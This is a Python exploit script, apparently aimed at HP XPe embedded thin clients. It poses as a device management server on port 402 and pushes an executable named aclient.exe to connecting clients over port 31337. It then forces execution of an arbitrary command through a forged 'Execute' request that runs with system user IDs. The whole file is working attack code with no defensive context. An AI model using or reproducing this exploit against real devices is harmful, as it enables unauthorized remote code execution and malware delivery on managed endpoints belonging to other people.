hpwhytry.py

#!/usr/bin/env python
# Exploit can send files & exec files to HP XPe embedded devices.
# while(!(success=try()))
import sys
import os
import socket
import threading

phase1 ="Reply=UpdateComputer\nID=5000009\nBoot=Production\n"\
		"Server-Name=FANTASTI-X18IHG\nResult=Success\nWork-To-Do=Yes\n"\
		"DSVersion=6.9.375\nUpdateSettings=No\nAuto-Update=Yes\n\x00"\
		"Request=SendFile\nFilename=self:aclient.exe\nDate=1238424600\n"\
		"Attributes=32\nSize=5365836\nPort=31337\nCurrentFileCount=1\n"\
		"TotalFileCount=1\nTotalFileCopySize=5365836\nID=5000009\n"\
		"Task-Type=CopyFile\n\x00"

phase2="Reply=CloseSession\nResult=Success\n\x00"

exploit="Request=LiveEvent\nEvent=Execute\nExecute="

exploit2="\nWindow=1\nUser-ID=0SystemUser-ID=100000\nRunUserSession=0\n\x00"
		
class HPCommander ( threading.Thread ):
	def __init__ (self,cmd):
		self.cmd = cmd	
		threading.Thread.__init__ (self)
		
	def run(self):
		s = socket.socket()
		s.bind(("0.0.0.0",402))
		s.listen(1)
		print "[ Started hpwhytry"	
		while 1:		
			(cli,add) = s.accept()
			data = cli.recv(100000)
			if data.find('Request=UpdateComputer') != -1:
				if data.find('Version=6.9.375') != -1:
					print "[ Exploiting client exec"
					cli.send(exploit)					
					cli.send(cmd)
					cli.send(exploit2)
					data = cli.recv(10000)
				else:
					print "[ Client record seen, updating for exec"
					cli.send(phase1)
					data = cli.recv(100000)
					data = cli.recv(100000)
					if data.find('Request=CloseSession') != -1:
						print "[ Client session closed."
						cli.send(phase2)
						cli.close()			

class FileMon ( threading.Thread):
	def run(self):
		s = socket.socket()	
		s.bind(("0.0.0.0",31337))	
		s.listen(1)
		while 1:		
			(cli,add) = s.accept()
			data = cli.recv(100000)
			f = open('aclient.exe','rb')
			data = f.read()
			cli.send(data)
			cli.close()					

if __name__ == "__main__":
	cmd = sys.argv[1]
	HPCommander(cmd).start()
	FileMon().start()